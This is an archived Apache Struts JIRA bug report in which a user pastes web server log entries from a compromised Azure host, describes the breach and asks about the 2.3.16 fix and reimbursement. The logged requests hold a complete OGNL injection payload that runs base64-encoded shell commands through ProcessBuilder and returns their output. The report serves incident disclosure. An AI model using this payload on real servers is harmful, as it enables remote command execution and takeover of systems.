struts-issues mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
Subject [jira] [Created] (WW-4304) Security issues with sturts 2.3.x
Date Wed, 19 Mar 2014 14:01:04 GMT
RAJA SEKHAR created WW-4304:

             Summary: Security issues with sturts 2.3.x
                 Key: WW-4304
             Project: Struts 2
          Issue Type: Bug
          Components: Core Actions
    Affects Versions: 2.3.12
         Environment: Ubuntu on microsoft windows azure
            Reporter: RAJA SEKHAR
             Fix For: 2.3.12

I have analyzed the logs for SMA and i found out the following in log files - - [24/Feb/2014:04:31:49 +0000] "GET /testimonialsList.action?redirect:$%7B%23p%3Dnew%20java.lang.String(new+sun.misc.BASE64Decoder().decodeBuffer("d2hvYW1p")),%20%23a%3d%28new%20java.lang.ProcessBuilder%28%23p.split(%22%20%22)%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,,,%23e%3dnew%20char%5B50000%5D,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23arr%3Dnew%20int[1],,%20%23arr.{(%23len%3D%3D-1)%3F%23{%23len%3D-1}%3A{%23matt.getWriter%28%29.print%28new%20java.lang.String%28%23e,0,%23len%29%29,}},%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29%7D
HTTP/1.1" 200 15 - - [24/Feb/2014:04:31:49 +0000] "GET /testimonialsList.action?redirect:$%7B%23p%3Dnew%20java.lang.String(new+sun.misc.BASE64Decoder().decodeBuffer("dW5hbWUgLWE%3D")),%20%23a%3d%28new%20java.lang.ProcessBuilder%28%23p.split(%22%20%22)%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,,,%23e%3dnew%20char%5B50000%5D,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23arr%3Dnew%20int[100],,%23arr.{(%23len%3D%3D-1)%3F%23{%23len%3D-1}%3A{%23matt.getWriter%28%29.print%28new%20java.lang.String%28%23e,0,%23len%29%29,}},%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29%7D
HTTP/1.1" 200 115
I have seen these entries in log file. Through this intruder has hacked the system by finding
the issue name /passwords etc and he has taken control of the system.
By this he created files in ROOT directory , and he was running DOS attacks on the system.
This led to large data transfer and there was a bill of 1000$ was generated to our customer.
I found that the issue is fixed in version 2.3.16. 
I have following questions 
1) are these issues are fixed in 2.3.16.
2) Since the root cause of the problem is with struts - , do you reimburse the bill.

Please help us resolving this use

This message was sent by Atlassian JIRA

View raw message